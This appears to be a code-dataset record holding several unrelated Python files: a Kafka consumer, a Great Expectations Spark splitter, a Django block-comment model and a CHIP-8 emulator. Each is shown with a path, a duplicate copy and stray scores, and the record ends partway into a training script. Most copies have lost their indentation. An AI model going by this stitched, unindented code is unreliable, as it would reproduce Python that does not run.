from typing import Dict
import confluent_kafka, confluent_kafka.admin
from time import sleep
import socket
class KafkaIngest(BaseStreamingIngest):
"""KafkaIngest streams records from a provided kafka topic into the Job. Records are deserialized with the provided serializer.
"""
def __init__(self, serializer: Serializable, kafka_topic: str, bootstrap_server: str = "localhost", bootstrap_port: int = 9092, default_group: str ="default-group", *args, **kwargs):
"""Connects to a kafka topic and sets up the ingest
Args:
serializer (Serializable): Serializer to convert a message to bytes before sending to kafka.
kafka_topic (str): Name of kafka topic to publish to.
bootstrap_server (str, optional): Address of the Kafka bootstrap server. Defaults to "localhost".
bootstrap_port (int, optional): Bootstrap server port on which the topic is listening for messages. Defaults to 9092.
default_group (str, optional): Group name for this consumer group. Defaults to "default-group".
"""
self.kafka_topic = kafka_topic
conf = {
"bootstrap.servers": bootstrap_server + ":" + str(bootstrap_port),
"client.id":socket.gethostname(),
"group.id":default_group
}
self.create_topic(topic_name=kafka_topic, conf=conf) # TODO is this safe?
self.consumer = confluent_kafka.Consumer(conf)
self.consumer.subscribe([self.kafka_topic])
self.running = True
super().__init__(serializer=serializer, *args, **kwargs)
def next(self):
"""Sets up a Kafka Consumer poll to the topic and yields records one by one.
Raises:
KafkaException: Propagated from Kafka.
Returns:
(obj): A record.
"""
kafka_message = None
while kafka_message is None:
kafka_message = self.consumer.poll(timeout=1.0)
if kafka_message is None:
# There is no message to retrieve (methinks) TODO
sleep(0.1)
continue
if kafka_message.error():
if kafka_message.error().code() == confluent_kafka.KafkaError._PARTITION_EOF:
kafka_message = None
pass # TODO will need to add exception handling at some point
# End of partition event
#sys.stderr.write('%% %s [%d] reached end at offset %d\n' %
# (kafka_message.topic(), kafka_message.partition(), kafka_message.offset()))
elif kafka_message.error():
raise confluent_kafka.KafkaException(kafka_message.error())
return kafka_message.value()
def create_topic(self, topic_name: str, conf: Dict):
"""Helper function to create a topic. Blocks until topic is created.
Args:
topic_name (str): Topic name to create.
conf (Dict): Kafka admin client configuration.
"""
adminclient = confluent_kafka.admin.AdminClient(conf=conf)
topic = confluent_kafka.admin.NewTopic(topic=topic_name, num_partitions=1)
response = adminclient.create_topics([topic])
while not response[topic_name].done():
sleep(0.1) # TODO this is super hacky. There is bound to be a better way to do this.
del adminclient | 0.606149 | 0.132627 |
import hashlib
import logging
from typing import List, Union
from great_expectations.exceptions import exceptions as ge_exceptions
from great_expectations.execution_engine.split_and_sample.data_splitter import (
DataSplitter,
DatePart,
)
logger = logging.getLogger(__name__)
try:
import pyspark
import pyspark.sql.functions as F
# noinspection SpellCheckingInspection
import pyspark.sql.types as sparktypes
from pyspark.sql import DataFrame
except ImportError:
pyspark = None
F = None
DataFrame = None
# noinspection SpellCheckingInspection
sparktypes = None
logger.debug(
"Unable to load pyspark; install optional spark dependency if you will be working with Spark dataframes"
)
class SparkDataSplitter(DataSplitter):
"""Methods for splitting data accessible via SparkDFExecutionEngine.
Note, for convenience, you can also access DatePart via the instance variable
date_part e.g. SparkDataSplitter.date_part.MONTH
"""
def split_on_year(
    self,
    df: DataFrame,
    column_name: str,
    batch_identifiers: dict,
) -> DataFrame:
    """Filter ``df`` to rows whose ``column_name`` year matches the batch identifiers.

    Args:
        df: dataframe from batch data.
        column_name: column in table to use in determining split.
        batch_identifiers: a dateutil-parseable datetime (whose relevant date
            parts are used) or a mapping of {date_part: date_part_value}.

    Returns:
        Dataframe filtered on the YEAR date part.
    """
    # Delegate to the generic date-part splitter with a single part.
    return self.split_on_date_parts(df, column_name, batch_identifiers, [DatePart.YEAR])
def split_on_year_and_month(
    self,
    df: DataFrame,
    column_name: str,
    batch_identifiers: dict,
) -> DataFrame:
    """Filter ``df`` to rows whose ``column_name`` year and month match the batch identifiers.

    Args:
        df: dataframe from batch data.
        column_name: column in table to use in determining split.
        batch_identifiers: a dateutil-parseable datetime (whose relevant date
            parts are used) or a mapping of {date_part: date_part_value}.

    Returns:
        Dataframe filtered on the YEAR and MONTH date parts.
    """
    # Delegate to the generic date-part splitter with both parts.
    parts = [DatePart.YEAR, DatePart.MONTH]
    return self.split_on_date_parts(df, column_name, batch_identifiers, parts)
def split_on_year_and_month_and_day(
    self,
    df: DataFrame,
    column_name: str,
    batch_identifiers: dict,
) -> DataFrame:
    """Filter ``df`` to rows whose ``column_name`` year, month and day match the batch identifiers.

    Args:
        df: dataframe from batch data.
        column_name: column in table to use in determining split.
        batch_identifiers: a dateutil-parseable datetime (whose relevant date
            parts are used) or a mapping of {date_part: date_part_value}.

    Returns:
        Dataframe filtered on the YEAR, MONTH and DAY date parts.
    """
    # Delegate to the generic date-part splitter with all three parts.
    parts = [DatePart.YEAR, DatePart.MONTH, DatePart.DAY]
    return self.split_on_date_parts(df, column_name, batch_identifiers, parts)
def split_on_date_parts(
    self,
    df: DataFrame,
    column_name: str,
    batch_identifiers: dict,
    date_parts: Union[List[DatePart], List[str]],
) -> DataFrame:
    """Split on date_part values in column_name.

    Values are NOT truncated, for example this will return data for a
    given month (if only month is chosen for date_parts) for ALL years.
    This may be useful for viewing seasonality, but you can also specify
    multiple date_parts to achieve date_trunc like behavior e.g.
    year, month and day.

    Args:
        df: dataframe from batch data.
        column_name: column in data used to determine split.
        batch_identifiers: should contain a dateutil parseable datetime whose date parts
            will be used for splitting or key values of {date_part: date_part_value}
        date_parts: part of the date to be used for splitting e.g.
            DatePart.DAY or the case-insensitive string representation "day"

    Returns:
        Dataframe with splitting applied.
    """
    self._validate_date_parts(date_parts)
    # Normalize any string parts (e.g. "day") into DatePart enum members.
    date_parts: List[DatePart] = self._convert_date_parts(date_parts)
    column_batch_identifiers: dict = batch_identifiers[column_name]
    # Resolve the batch identifier (a datetime or a {date_part: value} dict)
    # into concrete {DatePart: value} pairs for the requested parts.
    date_parts_dict: dict = (
        self._convert_datetime_batch_identifiers_to_date_parts_dict(
            column_batch_identifiers, date_parts
        )
    )
    # Apply one filter per requested date part; successive filters accumulate
    # (AND semantics) on the same column.
    for date_part, date_part_value in date_parts_dict.items():
        df = df.filter(
            getattr(F, self._convert_date_part_to_spark_equivalent(date_part))(
                F.col(column_name)
            )
            == date_part_value
        )
    return df
@staticmethod
def _convert_date_part_to_spark_equivalent(date_part: Union[DatePart, str]) -> str:
    """Convert the DatePart to a string representing the corresponding pyspark.sql.functions version.

    For example DatePart.DAY -> pyspark.sql.functions.dayofmonth() -> "dayofmonth"

    Args:
        date_part: DatePart representing the part of the datetime to extract or string equivalent.

    Returns:
        String representing the spark function to use for the given DatePart.
    """
    # Coerce a string such as "day" into its DatePart member (raises ValueError
    # for unknown parts).
    date_part: DatePart = DatePart(date_part)
    spark_date_part_decoder: dict = {
        DatePart.YEAR: "year",
        DatePart.MONTH: "month",
        DatePart.WEEK: "weekofyear",
        DatePart.DAY: "dayofmonth",
        DatePart.HOUR: "hour",
        DatePart.MINUTE: "minute",
        DatePart.SECOND: "second",
    }
    return spark_date_part_decoder[date_part]
@staticmethod
def split_on_whole_table(
    df: DataFrame,
) -> DataFrame:
    """No op. Return the same data that is passed in.

    The whole table constitutes a single batch, so no filtering is applied.

    Args:
        df: Spark DataFrame that will be returned

    Returns:
        Unfiltered DataFrame.
    """
    return df
@staticmethod
def split_on_column_value(
    df, column_name: str, batch_identifiers: dict
) -> DataFrame:
    """Keep only the rows where ``column_name`` equals the value supplied in ``batch_identifiers``.

    Args:
        df: Spark DataFrame to be filtered.
        column_name: Column to use in comparison.
        batch_identifiers: Mapping holding the comparison value, e.g. {column_name: value}.

    Returns:
        Filtered spark DataFrame.
    """
    target_value = batch_identifiers[column_name]
    return df.filter(F.col(column_name) == target_value)
@staticmethod
def split_on_converted_datetime(
    df,
    column_name: str,
    batch_identifiers: dict,
    date_format_string: str = "yyyy-MM-dd",
) -> DataFrame:
    """Filter rows whose epoch timestamp in ``column_name``, rendered with
    ``date_format_string``, equals the datetime string from ``batch_identifiers``.

    Args:
        df: Spark DataFrame to be filtered.
        column_name: Column holding a unix timestamp to convert and compare.
        batch_identifiers: Value to use in comparison as {column_name: datetime string}.
        date_format_string: Format used to render the timestamp for comparison.

    Returns:
        Filtered spark DataFrame.
    """
    target_datetime = batch_identifiers[column_name]
    # Render the timestamp into a temporary string column, filter on it, then
    # drop the helper column so the schema is unchanged.
    rendered = F.from_unixtime(F.col(column_name), date_format_string)
    return (
        df.withColumn("date_time_tmp", rendered)
        .filter(F.col("date_time_tmp") == target_datetime)
        .drop("date_time_tmp")
    )
@staticmethod
def split_on_divided_integer(
df, column_name: str, divisor: int, batch_identifiers: dict
):
"""Divide the values in the named column by `divisor`, and split on that"""
matching_divisor = batch_identifiers[column_name]
res = (
df.withColumn(
"div_temp",
(F.col(column_name) / divisor).cast(sparktypes.IntegerType()),
)
.filter(F.col("div_temp") == matching_divisor)
.drop("div_temp")
)
return res
@staticmethod
def split_on_mod_integer(df, column_name: str, mod: int, batch_identifiers: dict):
"""Divide the values in the named column by `divisor`, and split on that"""
matching_mod_value = batch_identifiers[column_name]
res = (
df.withColumn(
"mod_temp", (F.col(column_name) % mod).cast(sparktypes.IntegerType())
)
.filter(F.col("mod_temp") == matching_mod_value)
.drop("mod_temp")
)
return res
@staticmethod
def split_on_multi_column_values(df, column_names: list, batch_identifiers: dict):
"""Split on the joint values in the named columns"""
for column_name in column_names:
value = batch_identifiers.get(column_name)
if not value:
raise ValueError(
f"In order for SparkDFExecutionEngine to `_split_on_multi_column_values`, "
f"all values in column_names must also exist in batch_identifiers. "
f"{column_name} was not found in batch_identifiers."
)
df = df.filter(F.col(column_name) == value)
return df
@staticmethod
def split_on_hashed_column(
df,
column_name: str,
hash_digits: int,
batch_identifiers: dict,
hash_function_name: str = "sha256",
):
"""Split on the hashed value of the named column"""
try:
getattr(hashlib, hash_function_name)
except (TypeError, AttributeError):
raise (
ge_exceptions.ExecutionEngineError(
f"""The splitting method used with SparkDFExecutionEngine has a reference to an invalid hash_function_name.
Reference to {hash_function_name} cannot be found."""
)
)
def _encrypt_value(to_encode):
hash_func = getattr(hashlib, hash_function_name)
hashed_value = hash_func(to_encode.encode()).hexdigest()[-1 * hash_digits :]
return hashed_value
encrypt_udf = F.udf(_encrypt_value, sparktypes.StringType())
res = (
df.withColumn("encrypted_value", encrypt_udf(column_name))
.filter(F.col("encrypted_value") == batch_identifiers["hash_value"])
.drop("encrypted_value")
)
return res | great_expectations/execution_engine/split_and_sample/sparkdf_data_splitter.py | import hashlib
import logging
from typing import List, Union
from great_expectations.exceptions import exceptions as ge_exceptions
from great_expectations.execution_engine.split_and_sample.data_splitter import (
DataSplitter,
DatePart,
)
logger = logging.getLogger(__name__)
try:
import pyspark
import pyspark.sql.functions as F
# noinspection SpellCheckingInspection
import pyspark.sql.types as sparktypes
from pyspark.sql import DataFrame
except ImportError:
pyspark = None
F = None
DataFrame = None
# noinspection SpellCheckingInspection
sparktypes = None
logger.debug(
"Unable to load pyspark; install optional spark dependency if you will be working with Spark dataframes"
)
class SparkDataSplitter(DataSplitter):
"""Methods for splitting data accessible via SparkDFExecutionEngine.
Note, for convenience, you can also access DatePart via the instance variable
date_part e.g. SparkDataSplitter.date_part.MONTH
"""
def split_on_year(
self,
df: DataFrame,
column_name: str,
batch_identifiers: dict,
) -> DataFrame:
"""Split on year values in column_name.
Args:
df: dataframe from batch data.
column_name: column in table to use in determining split.
batch_identifiers: should contain a dateutil parseable datetime whose
relevant date parts will be used for splitting or key values
of {date_part: date_part_value}.
Returns:
List of boolean clauses based on whether the date_part value in the
batch identifier matches the date_part value in the column_name column.
"""
return self.split_on_date_parts(
df=df,
column_name=column_name,
batch_identifiers=batch_identifiers,
date_parts=[DatePart.YEAR],
)
def split_on_year_and_month(
self,
df: DataFrame,
column_name: str,
batch_identifiers: dict,
) -> DataFrame:
"""Split on year and month values in column_name.
Args:
df: dataframe from batch data.
column_name: column in table to use in determining split.
batch_identifiers: should contain a dateutil parseable datetime whose
relevant date parts will be used for splitting or key values
of {date_part: date_part_value}.
Returns:
List of boolean clauses based on whether the date_part value in the
batch identifier matches the date_part value in the column_name column.
"""
return self.split_on_date_parts(
df=df,
column_name=column_name,
batch_identifiers=batch_identifiers,
date_parts=[DatePart.YEAR, DatePart.MONTH],
)
def split_on_year_and_month_and_day(
self,
df: DataFrame,
column_name: str,
batch_identifiers: dict,
) -> DataFrame:
"""Split on year and month and day values in column_name.
Args:
df: dataframe from batch data.
column_name: column in table to use in determining split.
batch_identifiers: should contain a dateutil parseable datetime whose
relevant date parts will be used for splitting or key values
of {date_part: date_part_value}.
Returns:
List of boolean clauses based on whether the date_part value in the
batch identifier matches the date_part value in the column_name column.
"""
return self.split_on_date_parts(
df=df,
column_name=column_name,
batch_identifiers=batch_identifiers,
date_parts=[DatePart.YEAR, DatePart.MONTH, DatePart.DAY],
)
def split_on_date_parts(
self,
df: DataFrame,
column_name: str,
batch_identifiers: dict,
date_parts: Union[List[DatePart], List[str]],
) -> DataFrame:
"""Split on date_part values in column_name.
Values are NOT truncated, for example this will return data for a
given month (if only month is chosen for date_parts) for ALL years.
This may be useful for viewing seasonality, but you can also specify
multiple date_parts to achieve date_trunc like behavior e.g.
year, month and day.
Args:
df: dataframe from batch data.
column_name: column in data used to determine split.
batch_identifiers: should contain a dateutil parseable datetime whose date parts
will be used for splitting or key values of {date_part: date_part_value}
date_parts: part of the date to be used for splitting e.g.
DatePart.DAY or the case-insensitive string representation "day"
Returns:
Dataframe with splitting applied.
"""
self._validate_date_parts(date_parts)
date_parts: List[DatePart] = self._convert_date_parts(date_parts)
column_batch_identifiers: dict = batch_identifiers[column_name]
date_parts_dict: dict = (
self._convert_datetime_batch_identifiers_to_date_parts_dict(
column_batch_identifiers, date_parts
)
)
for date_part, date_part_value in date_parts_dict.items():
df = df.filter(
getattr(F, self._convert_date_part_to_spark_equivalent(date_part))(
F.col(column_name)
)
== date_part_value
)
return df
@staticmethod
def _convert_date_part_to_spark_equivalent(date_part: [DatePart, str]) -> str:
"""Convert the DatePart to a string representing the corresponding pyspark.sql.functions version.
For example DatePart.DAY -> pyspark.sql.functions.dayofmonth() -> "dayofmonth"
Args:
date_part: DatePart representing the part of the datetime to extract or string equivalent.
Returns:
String representing the spark function to use for the given DatePart.
"""
date_part: DatePart = DatePart(date_part)
spark_date_part_decoder: dict = {
DatePart.YEAR: "year",
DatePart.MONTH: "month",
DatePart.WEEK: "weekofyear",
DatePart.DAY: "dayofmonth",
DatePart.HOUR: "hour",
DatePart.MINUTE: "minute",
DatePart.SECOND: "second",
}
return spark_date_part_decoder[date_part]
@staticmethod
def split_on_whole_table(
df: DataFrame,
) -> DataFrame:
"""No op. Return the same data that is passed in.
Args:
df: Spark DataFrame that will be returned
Returns:
Unfiltered DataFrame.
"""
return df
@staticmethod
def split_on_column_value(
df, column_name: str, batch_identifiers: dict
) -> DataFrame:
"""Return a dataframe where rows are filtered based on the specified column value.
Args:
df: Spark DataFrame to be filtered.
column_name: Column to use in comparison.
batch_identifiers: Contains value to use in comparison e.g. batch_identifiers={ 'col': value }.
Returns:
Filtered spark DataFrame.
"""
return df.filter(F.col(column_name) == batch_identifiers[column_name])
@staticmethod
def split_on_converted_datetime(
df,
column_name: str,
batch_identifiers: dict,
date_format_string: str = "yyyy-MM-dd",
) -> DataFrame:
"""Return a dataframe where rows are filtered based on whether their converted
datetime (using date_format_string) matches the datetime string value provided
in batch_identifiers for the specified column.
Args:
df: Spark DataFrame to be filtered.
column_name: Column to use in comparison.
batch_identifiers: Value to use in comparison as {column_name: datetime string}.
date_format_string: Format used to convert datetime column for comparison to
batch identifiers.
Returns:
Filtered spark DataFrame.
"""
matching_string = batch_identifiers[column_name]
res = (
df.withColumn(
"date_time_tmp", F.from_unixtime(F.col(column_name), date_format_string)
)
.filter(F.col("date_time_tmp") == matching_string)
.drop("date_time_tmp")
)
return res
@staticmethod
def split_on_divided_integer(
df, column_name: str, divisor: int, batch_identifiers: dict
):
"""Divide the values in the named column by `divisor`, and split on that"""
matching_divisor = batch_identifiers[column_name]
res = (
df.withColumn(
"div_temp",
(F.col(column_name) / divisor).cast(sparktypes.IntegerType()),
)
.filter(F.col("div_temp") == matching_divisor)
.drop("div_temp")
)
return res
@staticmethod
def split_on_mod_integer(df, column_name: str, mod: int, batch_identifiers: dict):
"""Divide the values in the named column by `divisor`, and split on that"""
matching_mod_value = batch_identifiers[column_name]
res = (
df.withColumn(
"mod_temp", (F.col(column_name) % mod).cast(sparktypes.IntegerType())
)
.filter(F.col("mod_temp") == matching_mod_value)
.drop("mod_temp")
)
return res
@staticmethod
def split_on_multi_column_values(df, column_names: list, batch_identifiers: dict):
"""Split on the joint values in the named columns"""
for column_name in column_names:
value = batch_identifiers.get(column_name)
if not value:
raise ValueError(
f"In order for SparkDFExecutionEngine to `_split_on_multi_column_values`, "
f"all values in column_names must also exist in batch_identifiers. "
f"{column_name} was not found in batch_identifiers."
)
df = df.filter(F.col(column_name) == value)
return df
@staticmethod
def split_on_hashed_column(
df,
column_name: str,
hash_digits: int,
batch_identifiers: dict,
hash_function_name: str = "sha256",
):
"""Split on the hashed value of the named column"""
try:
getattr(hashlib, hash_function_name)
except (TypeError, AttributeError):
raise (
ge_exceptions.ExecutionEngineError(
f"""The splitting method used with SparkDFExecutionEngine has a reference to an invalid hash_function_name.
Reference to {hash_function_name} cannot be found."""
)
)
def _encrypt_value(to_encode):
hash_func = getattr(hashlib, hash_function_name)
hashed_value = hash_func(to_encode.encode()).hexdigest()[-1 * hash_digits :]
return hashed_value
encrypt_udf = F.udf(_encrypt_value, sparktypes.StringType())
res = (
df.withColumn("encrypted_value", encrypt_udf(column_name))
.filter(F.col("encrypted_value") == batch_identifiers["hash_value"])
.drop("encrypted_value")
)
return res | 0.898639 | 0.610628 |
import difflib
from django.contrib.comments.models import Comment
from django.db import models
from django.utils.translation import ugettext as _
from block_comment.diff_match_patch import diff_match_patch
class BlockComment(Comment):
'''
``BlockComment`` extends Django's comments framework to store information
about the block of text the comment relates to.
'''
# Position in the full text that the block the comment relates to begins at
index = models.PositiveIntegerField(null=True, blank=True)
# The text of the block, used for determining diffs/orphans
regarding = models.TextField(blank=True)
def get_match_index(self, haystack):
''' Returns the index of the closest match to needle within
the haystack. '''
def get_block_index(i):
''' ``haystack`` and ``blocks`` are accessible by closure. '''
return haystack.index(blocks[i])
needle = self.regarding.strip()
matches = []
blocks = haystack.split("\n")
block_index = None
# Check for an exact match first
if needle in blocks:
return get_block_index(blocks.index(needle))
# If that didn't work, do a basic diff comparison block-by-block
for p in blocks:
comp = difflib.SequenceMatcher(None, needle, p)
if comp.ratio() > .85:
matches.append(blocks.index(comp.b))
if len(matches) == 1:
block_index = matches.pop()
elif len(matches) == 0:
# No matches, can we find a potential match with a smarter
# matching algorithm?
matcher = diff_match_patch()
index = matcher.match_main(haystack, needle, 0)
if index > -1:
return index
else:
# We've got multiple options, let's narrow them down with
# a smarter matching algorithm.
matcher = diff_match_patch()
for i in tuple(matches):
if matcher.match_main(blocks[i], needle, self.index) < 0:
# No match, discard this option
matches.remove(i)
# Unless we've only got one match left, we'll fall through to -1
if len(matches) == 1:
block_index = matches[0]
if block_index:
return get_block_index(block_index)
# If we can't find anything, return -1
return -1
def relink_comment(self, haystack, save=True):
index = self.get_match_index(haystack)
if index == self.index:
return None
elif index > -1:
self.index = index
else:
self.index = None
if save:
self.save() | block_comment/models.py |
import difflib
from django.contrib.comments.models import Comment
from django.db import models
from django.utils.translation import ugettext as _
from block_comment.diff_match_patch import diff_match_patch
class BlockComment(Comment):
'''
``BlockComment`` extends Django's comments framework to store information
about the block of text the comment relates to.
'''
# Position in the full text that the block the comment relates to begins at
index = models.PositiveIntegerField(null=True, blank=True)
# The text of the block, used for determining diffs/orphans
regarding = models.TextField(blank=True)
def get_match_index(self, haystack):
''' Returns the index of the closest match to needle within
the haystack. '''
def get_block_index(i):
''' ``haystack`` and ``blocks`` are accessible by closure. '''
return haystack.index(blocks[i])
needle = self.regarding.strip()
matches = []
blocks = haystack.split("\n")
block_index = None
# Check for an exact match first
if needle in blocks:
return get_block_index(blocks.index(needle))
# If that didn't work, do a basic diff comparison block-by-block
for p in blocks:
comp = difflib.SequenceMatcher(None, needle, p)
if comp.ratio() > .85:
matches.append(blocks.index(comp.b))
if len(matches) == 1:
block_index = matches.pop()
elif len(matches) == 0:
# No matches, can we find a potential match with a smarter
# matching algorithm?
matcher = diff_match_patch()
index = matcher.match_main(haystack, needle, 0)
if index > -1:
return index
else:
# We've got multiple options, let's narrow them down with
# a smarter matching algorithm.
matcher = diff_match_patch()
for i in tuple(matches):
if matcher.match_main(blocks[i], needle, self.index) < 0:
# No match, discard this option
matches.remove(i)
# Unless we've only got one match left, we'll fall through to -1
if len(matches) == 1:
block_index = matches[0]
if block_index:
return get_block_index(block_index)
# If we can't find anything, return -1
return -1
def relink_comment(self, haystack, save=True):
index = self.get_match_index(haystack)
if index == self.index:
return None
elif index > -1:
self.index = index
else:
self.index = None
if save:
self.save() | 0.591369 | 0.380241 |
import array
from collections import namedtuple
import pathlib
import time
from .clock import stabilize_frame
from .code import dispatch
from .config import Config
from .debug import Disassembler
from .errors import ChippyError
from .processor import ExecutionUnit
from .status import Mode
from .window import buzz, Window
class Chippy:
def __init__(self, config=Config()):
"""Initialize RAM, registers, stack, IO and sprite data."""
self.ram = bytearray([0x00] * 4096)
self.registers = bytearray([0x00] * 16)
self.I = 0x0000
self.sound_timer = 0x00
self.delay_timer = 0x00
self.program_counter = 0x0200
self.stack_pointer = 0x00
self.stack = array.array('H', [0x0000] * 16)
self.keypad = 0x0000
self.display = None
# 64-by-32 display
self.initialize_display()
self.initialize_sprite_data()
self.status = Mode.STOP
self.waiting = []
self.config = config
self.disassembler = Disassembler()
self.execution_unit = ExecutionUnit(self)
def initialize_display(self):
"""Clear display."""
self.display = array.array('Q', [0x0000000000000000] * 32)
def initialize_sprite_data(self):
"""Initialize sprite data in locates 0x000 to 0x050."""
self.ram[:5] = (0xf0, 0x90, 0x90, 0x90, 0xf0)
self.ram[5:10] = (0x20, 0x60, 0x20, 0x20, 0x70)
self.ram[10:15] = (0Xf0, 0x10, 0xf0, 0x80, 0xf0)
self.ram[15:20] = (0xf0, 0x10, 0xf0, 0x10, 0xf0)
self.ram[20:25] = (0x90, 0x90, 0xf0, 0x10, 0x10)
self.ram[25:30] = (0xf0, 0x80, 0xf0, 0x10, 0xf0)
self.ram[30:35] = (0xf0, 0x80, 0xf0, 0x90, 0xf0)
self.ram[35:40] = (0xf0, 0x10, 0x20, 0x40, 0x40)
self.ram[40:45] = (0xf0, 0x90, 0xf0, 0x90, 0xf0)
self.ram[45:50] = (0xf0, 0x90, 0xf0, 0x10, 0xf0)
self.ram[50:55] = (0xf0, 0x90, 0xf0, 0x90, 0x90)
self.ram[55:60] = (0xe0, 0x90, 0xe0, 0x90, 0xe0)
self.ram[60:65] = (0xf0, 0x80, 0x80, 0x80, 0xf0)
self.ram[65:70] = (0xe0, 0x90, 0x90, 0x90, 0xe0)
self.ram[70:75] = (0xf0, 0x80, 0xf0, 0x80, 0xf0)
self.ram[75:80] = (0xf0, 0x80, 0xf0, 0x80, 0x80)
def jump(self, target):
"""Jump to target location."""
if target < 0x200 or target >= len(self.ram):
raise ChippyError(f"Invalid jump target: {target:#05x}")
self.program_counter = target
def load(self, program: pathlib.Path):
"""Load program into address 0x200."""
binary = program.read_bytes()
size = len(binary)
if size >= len(self.ram) - 0x200:
raise ChippyError("Ran out of memory.")
self.ram[0x200:size + 0x200] = binary
def fetch(self):
"""Fetch current instruction."""
msb = self.ram[self.program_counter]
lsb = self.ram[self.program_counter + 1]
return (msb << 8) | lsb
def increment(self):
"""Increment program counter.
This is called by instruction handlers.
"""
self.program_counter += 2
self.program_counter &= 0x0fff
def cycle(self):
"""Simulate one cycle."""
if not self.waiting:
instruction = self.fetch()
self.increment()
print(dispatch(instruction, self.disassembler))
dispatch(instruction, self.execution_unit)
def countdown(self):
"""Decrement timers and perform timer-related actions."""
if self.delay_timer > 0:
self.delay_timer -= 1
if self.sound_timer > 0:
self.sound_timer -= 1
buzz()
def run(self):
"""Run program stored in memory."""
self.status = Mode.RUN
window = Window(self)
window.init_screen()
stages = (self.cycle, window.handle_events, window.render)
timer_60Hz = 0.01667
while self.status != Mode.STOP:
if self.status == Mode.RUN:
elapsed = stabilize_frame(self.config.clock_period, *stages)
timer_60Hz -= elapsed
if timer_60Hz <= 0:
timer_60Hz = 0.01667
self.countdown()
elif self.status == Mode.PAUSE:
window.handle_events()
window.render() | chippy/chippy.py |
import array
from collections import namedtuple
import pathlib
import time
from .clock import stabilize_frame
from .code import dispatch
from .config import Config
from .debug import Disassembler
from .errors import ChippyError
from .processor import ExecutionUnit
from .status import Mode
from .window import buzz, Window
class Chippy:
def __init__(self, config=Config()):
"""Initialize RAM, registers, stack, IO and sprite data."""
self.ram = bytearray([0x00] * 4096)
self.registers = bytearray([0x00] * 16)
self.I = 0x0000
self.sound_timer = 0x00
self.delay_timer = 0x00
self.program_counter = 0x0200
self.stack_pointer = 0x00
self.stack = array.array('H', [0x0000] * 16)
self.keypad = 0x0000
self.display = None
# 64-by-32 display
self.initialize_display()
self.initialize_sprite_data()
self.status = Mode.STOP
self.waiting = []
self.config = config
self.disassembler = Disassembler()
self.execution_unit = ExecutionUnit(self)
def initialize_display(self):
"""Clear display."""
self.display = array.array('Q', [0x0000000000000000] * 32)
def initialize_sprite_data(self):
"""Initialize sprite data in locates 0x000 to 0x050."""
self.ram[:5] = (0xf0, 0x90, 0x90, 0x90, 0xf0)
self.ram[5:10] = (0x20, 0x60, 0x20, 0x20, 0x70)
self.ram[10:15] = (0Xf0, 0x10, 0xf0, 0x80, 0xf0)
self.ram[15:20] = (0xf0, 0x10, 0xf0, 0x10, 0xf0)
self.ram[20:25] = (0x90, 0x90, 0xf0, 0x10, 0x10)
self.ram[25:30] = (0xf0, 0x80, 0xf0, 0x10, 0xf0)
self.ram[30:35] = (0xf0, 0x80, 0xf0, 0x90, 0xf0)
self.ram[35:40] = (0xf0, 0x10, 0x20, 0x40, 0x40)
self.ram[40:45] = (0xf0, 0x90, 0xf0, 0x90, 0xf0)
self.ram[45:50] = (0xf0, 0x90, 0xf0, 0x10, 0xf0)
self.ram[50:55] = (0xf0, 0x90, 0xf0, 0x90, 0x90)
self.ram[55:60] = (0xe0, 0x90, 0xe0, 0x90, 0xe0)
self.ram[60:65] = (0xf0, 0x80, 0x80, 0x80, 0xf0)
self.ram[65:70] = (0xe0, 0x90, 0x90, 0x90, 0xe0)
self.ram[70:75] = (0xf0, 0x80, 0xf0, 0x80, 0xf0)
self.ram[75:80] = (0xf0, 0x80, 0xf0, 0x80, 0x80)
def jump(self, target):
"""Jump to target location."""
if target < 0x200 or target >= len(self.ram):
raise ChippyError(f"Invalid jump target: {target:#05x}")
self.program_counter = target
def load(self, program: pathlib.Path):
"""Load program into address 0x200."""
binary = program.read_bytes()
size = len(binary)
if size >= len(self.ram) - 0x200:
raise ChippyError("Ran out of memory.")
self.ram[0x200:size + 0x200] = binary
def fetch(self):
"""Fetch current instruction."""
msb = self.ram[self.program_counter]
lsb = self.ram[self.program_counter + 1]
return (msb << 8) | lsb
def increment(self):
"""Increment program counter.
This is called by instruction handlers.
"""
self.program_counter += 2
self.program_counter &= 0x0fff
def cycle(self):
"""Simulate one cycle."""
if not self.waiting:
instruction = self.fetch()
self.increment()
print(dispatch(instruction, self.disassembler))
dispatch(instruction, self.execution_unit)
def countdown(self):
"""Decrement timers and perform timer-related actions."""
if self.delay_timer > 0:
self.delay_timer -= 1
if self.sound_timer > 0:
self.sound_timer -= 1
buzz()
def run(self):
"""Run program stored in memory."""
self.status = Mode.RUN
window = Window(self)
window.init_screen()
stages = (self.cycle, window.handle_events, window.render)
timer_60Hz = 0.01667
while self.status != Mode.STOP:
if self.status == Mode.RUN:
elapsed = stabilize_frame(self.config.clock_period, *stages)
timer_60Hz -= elapsed
if timer_60Hz <= 0:
timer_60Hz = 0.01667
self.countdown()
elif self.status == Mode.PAUSE:
window.handle_events()
window.render() | 0.615781 | 0.229686 |
import os
import random
import _pickle as pickle
import tensorflow as tf
from tensorflow.keras.callbacks import LearningRateScheduler
import numpy as np
from models.model import Sherbet, SherbetFeature
from models.loss import medical_codes_loss
from metrics import EvaluateCodesCallBack, EvaluateHFCallBack
from utils import DataGenerator, lr_decay
# Pin every RNG (Python, NumPy, TensorFlow) so training runs are reproducible.
seed = 6669
random.seed(seed)
np.random.seed(seed)
tf.random.set_seed(seed)
def load_data(dataset_path):
    """Load the pickled datasets rooted at ``dataset_path``.

    Args:
        dataset_path: directory containing the ``encoded`` and ``standard``
            sub-directories produced by preprocessing.

    Returns:
        Tuple of (code_maps, pretrain_codes_data, codes_dataset, hf_dataset,
        auxiliary), each exactly as unpickled from disk.
    """
    def _unpickle(*parts):
        # Context manager so every file handle is closed deterministically;
        # the previous bare open(...) calls leaked handles until GC.
        with open(os.path.join(dataset_path, *parts), 'rb') as f:
            return pickle.load(f)

    code_maps = _unpickle('encoded', 'code_maps.pkl')
    pretrain_codes_data = _unpickle('standard', 'pretrain_codes_dataset.pkl')
    codes_dataset = _unpickle('standard', 'codes_dataset.pkl')
    hf_dataset = _unpickle('standard', 'heart_failure.pkl')
    auxiliary = _unpickle('standard', 'auxiliary.pkl')
    return code_maps, pretrain_codes_data, codes_dataset, hf_dataset, auxiliary
if __name__ == '__main__':
dataset = 'mimic3' # 'mimic3' or 'eicu'
dataset_path = os.path.join('data', dataset)
code_maps, pretrain_codes_data, codes_dataset, hf_dataset, auxiliary = load_data(dataset_path)
code_map, code_map_pretrain = code_maps['code_map'], code_maps['code_map_pretrain']
(train_codes_data, valid_codes_data, test_codes_data) = (codes_dataset['train_codes_data'],
codes_dataset['valid_codes_data'],
